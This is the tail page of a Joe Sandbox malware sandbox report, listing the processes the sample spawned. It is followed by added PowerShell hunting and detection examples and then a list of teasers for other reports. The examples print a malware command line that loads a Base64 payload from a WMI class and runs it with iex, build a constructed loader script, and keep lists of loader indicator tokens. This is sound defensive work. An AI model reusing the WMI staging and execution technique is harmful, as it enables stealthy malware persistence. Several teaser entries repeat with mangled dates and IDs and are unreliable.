26 Commandline: Imagebase: File size: MD5 hash: Programmed in: 'C:\Windows\Microsoft.NET\Framework\v \csc.exe' /noconfig er\appdata\local\temp\oyswbnum.cmdline' 0x74db bytes 0A1C81BDCB030222A0B0A652B2C89D8D.Net C# or VB.NET Analysis Process: cvtres.exe PID: 3564 Parent PID: 3552 Start time: 04:06:43 Start date: 24/01/2018 Path: Wow64 process (32bit): Commandline: Imagebase: File size: MD5 hash: Programmed in: C:\Windows\Microsoft.NET\Framework\v \cvtres.exe C:\Windows\Microsoft.NET\Framework\v \cvtres.exe /NOLOGO /READONLY /MACH INE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES760E.tmp' 'c:\users\user\ AppData\Local\Temp\CSC75BC.tmp' 0x752a bytes 200FC355F85ECD4DB77FB3CAB2D01364 C, C++ or other language Analysis Process: NETSTAT.EXE PID: 3596 Parent PID: 3084 Start time: 04:06:47 Start date: 24/01/2018 Path: Wow64 process (32bit): Commandline: Imagebase: File size: MD5 hash: Programmed in: C:\Windows\System32\NETSTAT.EXE 'C:\Windows\system32\NETSTAT.EXE' -anop tcp 0x6e bytes 32297BB17E6EC700D0FC869F9ACAF561 C, C++ or other language Disassembly Code Analysis Copyright Joe Security LLC 2018 Page 26 of 26
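A hunt for the WMI staging technique used by the powershell.exe command line above, added here as an example; it is not part of the Joe Sandbox report and not the sample's own code. It enumerates every class in a set of namespaces and tests each string property's class-level default, which is exactly the value that ([WmiClass]'root\default:Office_Updater').Properties['funs'].Value returns. The namespace list, the indicator tokens, the 200-character threshold and the constructed sample value are assumptions of the example.

```powershell
# Added example, not from the Joe Sandbox report or the sample: hunt for script
# payloads staged as default property values of a custom WMI class, the way the
# analysed command reads 'mon' and 'funs' from root\default:Office_Updater.
# Namespaces, indicator tokens, the length threshold and the sample are assumptions.

function Test-EncodedScript {
    # Returns the decoded text when $Value is Base64 that decodes to text holding
    # an indicator token; returns $null for anything else (short, not Base64, binary).
    param([string]$Value, [int]$MinLength = 200)
    if ([string]::IsNullOrEmpty($Value) -or $Value.Length -lt $MinLength) { return $null }
    if ($Value -notmatch '^[A-Za-z0-9+/]+={0,2}$') { return $null }
    try { $bytes = [Convert]::FromBase64String($Value) } catch { return $null }
    $text = [Text.Encoding]::ASCII.GetString($bytes)
    # tokens from the analysed command line plus the usual in-memory loader verbs
    $tokens = 'Invoke-Expression', 'iex ', 'FromBase64String', 'Invoke-Command',
              'ScriptBlock', 'Add-Type', 'DllImport', 'Reflection.Assembly'
    foreach ($t in $tokens) {
        if ($text.IndexOf($t, [StringComparison]::OrdinalIgnoreCase) -ge 0) { return $text }
    }
    return $null
}

function Find-WmiStoredPayload {
    # Enumerates every class in each namespace and tests each string property's
    # class-level default (CimClassProperties[x].Value), the value the malware read.
    # CIM cmdlets take namespaces with forward slashes; root\default and root/default
    # are the same namespace.
    param([string[]]$Namespace = @('root/default', 'root/cimv2', 'root/subscription'))
    foreach ($ns in $Namespace) {
        $classes = Get-CimClass -Namespace $ns -ErrorAction SilentlyContinue
        foreach ($c in $classes) {
            foreach ($p in $c.CimClassProperties) {
                if ($p.CimType -ne [Microsoft.Management.Infrastructure.CimType]::String) { continue }
                $decoded = Test-EncodedScript -Value ([string]$p.Value)
                if ($null -eq $decoded) { continue }
                [pscustomobject]@{
                    Namespace     = $ns
                    Class         = $c.CimClassName
                    Property      = $p.Name
                    EncodedLength = ([string]$p.Value).Length
                    Preview       = $decoded.Substring(0, [Math]::Min(100, $decoded.Length))
                }
            }
        }
    }
}

# Constructed sample: a loader stanza encoded the way the sample stores 'funs'.
$sampleScript = @'
$RemoteScriptBlock = {
    param($payload, $kind, $flag, $a, $b)
    $code = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($payload))
    Invoke-Expression $code
}
'@
$sampleB64 = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes($sampleScript))
$null -ne (Test-EncodedScript -Value $sampleB64)          # True: flagged
$null -eq (Test-EncodedScript -Value 'SGVsbG8gV29ybGQ=')  # True: too short, ignored

# Live hunt on the current host (empty output on a clean machine).
Find-WmiStoredPayload | Format-Table -AutoSize
```

To cover namespaces the list does not name, recurse with Get-CimInstance -Namespace root -ClassName __NAMESPACE and feed the names back into -Namespace. Capture a hit before removing it (the decoded text is the second stage you will want to analyse); the class itself can then be dropped with ([WmiClass]'root\default:Office_Updater').Delete(), substituting the namespace and class name found.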

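A detection over process-creation telemetry built from the process tree on these pages, added here as an example; it is not part of the Joe Sandbox report and not the sample's own code. The Sysmon Event ID 1 field names (Image, CommandLine, ProcessId, ParentProcessId) are real; $SampleEvents is constructed from the PIDs and command lines recorded above, with the parent of PID 3084, the response-file name for PID 3416, the .NET framework directory and the cmd.exe control rows made up so that the block runs offline.

```powershell
# Added example, not from the Joe Sandbox report or the sample: turn the process
# tree on these pages into a detection over process-creation telemetry.
# Sysmon Event ID 1 field names are real; $SampleEvents is constructed from the
# PIDs and command lines in the report (parent of PID 3084, the response-file name
# for PID 3416, the framework directory and the cmd.exe control are made up).

function Get-SysmonProcessRecord {
    # Projects Sysmon Event ID 1 into the flat shape the rules below consume.
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } `
                 -MaxEvents $MaxEvents -ErrorAction Stop | ForEach-Object {
        $d = @{}
        foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{ Pid = [int]$d.ProcessId; ParentPid = [int]$d.ParentProcessId
                           Image = $d.Image; CommandLine = $d.CommandLine }
    }
}

function Get-Leaf([object]$Record) {
    if ($Record) { [IO.Path]::GetFileName($Record.Image).ToLowerInvariant() } else { '' }
}

function Get-AncestryString([hashtable]$ByPid, [object]$Record) {
    # "powershell.exe > csc.exe > cvtres.exe": walks ParentPid up to six levels.
    $names = @(); $cur = $Record
    while ($cur -and $names.Count -lt 6) { $names = @(Get-Leaf $cur) + $names; $cur = $ByPid[$cur.ParentPid] }
    $names -join ' > '
}

function Find-SuspiciousProcessChain {
    param([Parameter(Mandatory)][object[]]$Records)
    $byPid = @{}
    foreach ($r in $Records) { $byPid[$r.Pid] = $r }
    foreach ($r in $Records) {
        $leaf   = Get-Leaf $r
        $parent = $byPid[$r.ParentPid]
        $pLeaf  = Get-Leaf $parent
        $gp     = if ($parent) { $byPid[$parent.ParentPid] } else { $null }
        $gpLeaf = Get-Leaf $gp
        $reason = $null
        if ($leaf -eq 'csc.exe' -and $pLeaf -eq 'powershell.exe' -and
            $r.CommandLine -match '(?i)\\temp\\[^\\"'']+\.cmdline') {
            # Add-Type drives csc.exe with a response file in %TEMP% (oyswbnum.cmdline above)
            $reason = 'PowerShell Add-Type compile: csc.exe with a %TEMP% .cmdline response file'
        } elseif ($leaf -eq 'cvtres.exe' -and $pLeaf -eq 'csc.exe' -and $gpLeaf -eq 'powershell.exe') {
            # resource step of the same compile; cvtres under csc alone is ordinary build activity
            $reason = 'cvtres.exe under csc.exe under PowerShell'
        } elseif ($leaf -eq 'netstat.exe' -and $pLeaf -eq 'powershell.exe' -and
                  $r.CommandLine -match '(?i)\s-(?=[a-z]*n)(?=[a-z]*o)[a-z]+') {
            # a flag group holding both n and o: endpoints listed with owning PIDs
            $reason = 'PowerShell enumerating TCP endpoints with owning PIDs (netstat -ano*)'
        } elseif ($leaf -eq 'powershell.exe' -and
                  $r.CommandLine -match '(?i)\[WmiClass\]|Get-WmiObject|Get-CimClass' -and
                  $r.CommandLine -match '(?i)FromBase64String') {
            # the second PowerShell instance: payload pulled from a WMI class and decoded
            $reason = 'PowerShell loading a Base64 payload from a WMI class property'
        }
        if ($reason) {
            [pscustomobject]@{ Pid = $r.Pid; Chain = (Get-AncestryString $byPid $r); Reason = $reason }
        }
    }
}

# Constructed sample mirroring the report's process tree.
$PS  = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$CSC = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe'
$CVT = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe'
$NET = 'C:\Windows\System32\NETSTAT.EXE'
$SampleEvents = @(
    @{ Pid = 3084; ParentPid = 900;  Image = $PS;  CommandLine = 'powershell.exe -NoP -NonI -W Hidden' }
    @{ Pid = 3416; ParentPid = 3084; Image = $CSC; CommandLine = "`"$CSC`" /noconfig /fullpaths @`"C:\Users\user\AppData\Local\Temp\abcd1234.cmdline`"" }
    @{ Pid = 3424; ParentPid = 3416; Image = $CVT; CommandLine = "$CVT /NOLOGO /READONLY /MACHINE:IX86 `"/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES27A9.tmp`" c:\users\user\AppData\Local\Temp\CSC278A.tmp" }
    @{ Pid = 3440; ParentPid = 3084; Image = $NET; CommandLine = "`"$NET`" -anop tcp" }
    @{ Pid = 3464; ParentPid = 3084; Image = $PS;  CommandLine = '-NoP -NonI -W Hidden "$funs = ([WmiClass] ''root\default:Office_Updater'').Properties[''funs''].Value; iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($funs)))"' }
    @{ Pid = 3552; ParentPid = 3464; Image = $CSC; CommandLine = "`"$CSC`" /noconfig /fullpaths @`"C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline`"" }
    @{ Pid = 3564; ParentPid = 3552; Image = $CVT; CommandLine = "$CVT /NOLOGO /READONLY /MACHINE:IX86 `"/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES760E.tmp`" c:\users\user\AppData\Local\Temp\CSC75BC.tmp" }
    @{ Pid = 3596; ParentPid = 3084; Image = $NET; CommandLine = "`"$NET`" -anop tcp" }
    @{ Pid = 4100; ParentPid = 900;  Image = 'C:\Windows\System32\cmd.exe'; CommandLine = 'cmd.exe' }  # control
    @{ Pid = 4101; ParentPid = 4100; Image = $NET; CommandLine = 'netstat -an' }                        # must not match
) | ForEach-Object { [pscustomobject]$_ }

Find-SuspiciousProcessChain -Records $SampleEvents | Format-Table -AutoSize   # 7 hits, PIDs 3416-3596
# Live data: Find-SuspiciousProcessChain -Records (Get-SysmonProcessRecord)
```

The csc.exe rule keys on the %TEMP% response file rather than on csc.exe alone because developer workstations and build agents spawn csc.exe legitimately; the cvtres.exe rule likewise requires PowerShell as grandparent. Both rules depend on command-line capture, so the same logic on Security event 4688 needs "Include command line in process creation events" enabled.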

More information

ID: Sample Name: New invoice doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:49:06 Date: 07/11/2017 Version: 20.0.

ID: Sample Name: New invoice doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:49:06 Date: 07/11/2017 Version: 20.0. ID: 36381 Sample Name: New invoice 1385371761.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:4:06 Date: 07/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview

More information

ID: Sample Name: dialog.nvp Cookbook: default.jbs Time: 00:09:12 Date: 10/05/2018 Version:

ID: Sample Name: dialog.nvp Cookbook: default.jbs Time: 00:09:12 Date: 10/05/2018 Version: ID: 09 Sample Name: dialog.nvp Cookbook: default.jbs Time: 00:09:12 Date: 10/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: DOCS.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 16:07:38 Date: 06/02/2018 Version:

ID: Sample Name: DOCS.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 16:07:38 Date: 06/02/2018 Version: ID: 45263 Sample Name: DOCS.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 16:07:38 Date: 06/02/2018 Version: 20.0.0 Table of Contents Analysis Report Overview Information Detection Confidence Classification

More information

ID: Sample Name: INDUSTRIAL.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 02:35:30 Date: 25/04/2018 Version: 22.0.

ID: Sample Name: INDUSTRIAL.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 02:35:30 Date: 25/04/2018 Version: 22.0. ID: 56519 Sample Name: 20180542 INDUSTRIAL.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 02:35:30 Date: 25/04/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview Information

More information

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:55:50 Date:

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:55:50 Date: ID: 244 Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:55:50 Date: 05/10/201 Version: 24.0.0 Fire Opal Table of Contents

More information

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:52:31 Date:

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:52:31 Date: ID: 244 Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:52:31 Date: 05/10/201 Version: 24.0.0 Fire Opal Table of Contents

More information

ID: Sample Name: Liste1.jar Cookbook: default.jbs Time: 23:20:23 Date: 02/11/2017 Version:

ID: Sample Name: Liste1.jar Cookbook: default.jbs Time: 23:20:23 Date: 02/11/2017 Version: ID: 35936 Sample Name: Liste1.jar Cookbook: default.jbs Time: 23:20:23 Date: 02/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: lt.pak Cookbook: default.jbs Time: 12:40:34 Date: 26/07/2018 Version:

ID: Sample Name: lt.pak Cookbook: default.jbs Time: 12:40:34 Date: 26/07/2018 Version: ID: 90 Sample Name: lt.pak Cookbook: default.jbs Time: 12:40:4 Date: 2/0/201 Version: 2.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

More information

ID: Cookbook: browseurl.jbs Time: 23:36:16 Date: 10/04/2018 Version:

ID: Cookbook: browseurl.jbs Time: 23:36:16 Date: 10/04/2018 Version: ID: 54075 Cookbook: browseurl.jbs Time: 23:36:16 Date: 10/04/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Cookbook: browseurl.jbs Time: 18:45:10 Date: 08/10/2018 Version: Fire Opal

ID: Cookbook: browseurl.jbs Time: 18:45:10 Date: 08/10/2018 Version: Fire Opal ID: 82913 Cookbook: browseurl.jbs Time: 18:45:10 Date: 08/10/2018 Version: 24.0.0 Fire Opal Table of Contents Table of Contents Analysis Report http://www.learningtoolkit.club Overview General Information

More information

ID: Sample Name: SSB SBV Daily Report - Logistics Template DEC '17 (8).xlsm Cookbook: defaultwindowsofficecookbook.jbs Time: 06:35:29 Date:

ID: Sample Name: SSB SBV Daily Report - Logistics Template DEC '17 (8).xlsm Cookbook: defaultwindowsofficecookbook.jbs Time: 06:35:29 Date: ID: 41310 Sample Name: SSB SBV Daily Report - Logistics Template DEC '17 (8).xlsm Cookbook: defaultwindowsofficecookbook.jbs Time: 06:35:29 Date: 31/12/2017 Version: 20.0.0 Table of Contents Analysis Report

More information

ID: Sample Name: MobaXterm_installer_10.5.msi Cookbook: defaultwindowsmsicookbook.jbs Time: 18:29:36 Date: 25/05/2018 Version: 22.0.

ID: Sample Name: MobaXterm_installer_10.5.msi Cookbook: defaultwindowsmsicookbook.jbs Time: 18:29:36 Date: 25/05/2018 Version: 22.0. ID: 61258 Sample Name: MobaXterm_installer_10.5.msi Cookbook: defaultwindowsmsicookbook.jbs Time: 18:29:36 Date: 25/05/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection

More information

ID: Cookbook: browseurl.jbs Time: 20:04:11 Date: 14/06/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:04:11 Date: 14/06/2018 Version: ID: 64085 Cookbook: browseurl.jbs Time: 20:04:11 Date: 14/06/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: Request.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 15:59:16 Date: 22/11/2017 Version:

ID: Sample Name: Request.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 15:59:16 Date: 22/11/2017 Version: ID: 37845 Sample Name: Request.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 15:59:16 Date: 22/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection

More information

ID: Sample Name: emotet.exe Cookbook: defaultwindowsofficecookbook.jbs Time: 07:07:14 Date: 07/11/2017 Version:

ID: Sample Name: emotet.exe Cookbook: defaultwindowsofficecookbook.jbs Time: 07:07:14 Date: 07/11/2017 Version: ID: 3626 Sample Name: emotet.exe Cookbook: defaultwindowsofficecookbook.jbs Time: 0:0:14 Date: 0/11/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection

More information

ID: Cookbook: browseurl.jbs Time: 14:54:22 Date: 05/09/2018 Version:

ID: Cookbook: browseurl.jbs Time: 14:54:22 Date: 05/09/2018 Version: ID: 75522 Cookbook: browseurl.jbs Time: 14:54:22 Date: 05/09/2018 Version: 23.0.0 Table of Contents Table of Contents 2 Analysis Report http://www.springdwnld2.com/download/? d=0&h=1&pnid=4&domain=hmapsanddrivingdirection.com&implementation_id=maps_spt_&source=g-ccc7-lp0-

More information

ID: Sample Name:._k.php Cookbook: default.jbs Time: 05:41:18 Date: 25/04/2018 Version:

ID: Sample Name:._k.php Cookbook: default.jbs Time: 05:41:18 Date: 25/04/2018 Version: ID: 2 Sample Name:._k.php Cookbook: default.jbs Time: 0:41:1 Date: 2/04/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

More information

ID: Cookbook: browseurl.jbs Time: 00:46:14 Date: 03/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 00:46:14 Date: 03/07/2018 Version: ID: 66523 Cookbook: browseurl.jbs Time: 00:46:14 Date: 03/07/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Sample Name: zzz.ps1 Cookbook: default.jbs Time: 20:46:52 Date: 16/03/2018 Version:

ID: Sample Name: zzz.ps1 Cookbook: default.jbs Time: 20:46:52 Date: 16/03/2018 Version: ID: 50654 Sample Name: zzz.ps1 Cookbook: default.jbs Time: 20:46:52 Date: 16/03/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 15:47:47 Date: 11/05/2018 Version:

ID: Cookbook: browseurl.jbs Time: 15:47:47 Date: 11/05/2018 Version: ID: 59136 Cookbook: browseurl.jbs Time: 15:47:47 Date: 11/05/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

More information

ID: Cookbook: browseurl.jbs Time: 14:05:23 Date: 30/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 14:05:23 Date: 30/07/2018 Version: ID: 70096 Cookbook: browseurl.jbs Time: 14:05:23 Date: 30/07/2018 Version: 23.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: binarydata Cookbook: default.jbs Time: 22:09:57 Date: 22/11/2017 Version:

ID: Sample Name: binarydata Cookbook: default.jbs Time: 22:09:57 Date: 22/11/2017 Version: ID: 88 Sample Name: binarydata Cookbook: default.jbs Time: 22:09: Date: 22/11/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

More information

ID: Sample Name: _ doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:23:56 Date: 20/10/2017 Version: 20.0.

ID: Sample Name: _ doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:23:56 Date: 20/10/2017 Version: 20.0. ID: 34737 Sample Name: 20170927_655387.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:23:56 Date: 20/10/2017 Version: 20.0.0 Table of Contents Analysis Report Overview Information Detection Confidence

More information

ID: Cookbook: browseurl.jbs Time: 20:07:43 Date: 27/09/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:07:43 Date: 27/09/2018 Version: ID: 80599 Cookbook: browseurl.jbs Time: 20:07:43 Date: 27/09/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report http://www.qbproadvisorshelp.com Overview General Information Detection

More information

ID: Sample Name: scan00.html Cookbook: default.jbs Time: 22:21:27 Date: 16/12/2017 Version:

ID: Sample Name: scan00.html Cookbook: default.jbs Time: 22:21:27 Date: 16/12/2017 Version: ID: 40269 Sample Name: scan00.html Cookbook: default.jbs Time: 22:21:27 Date: 16/12/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information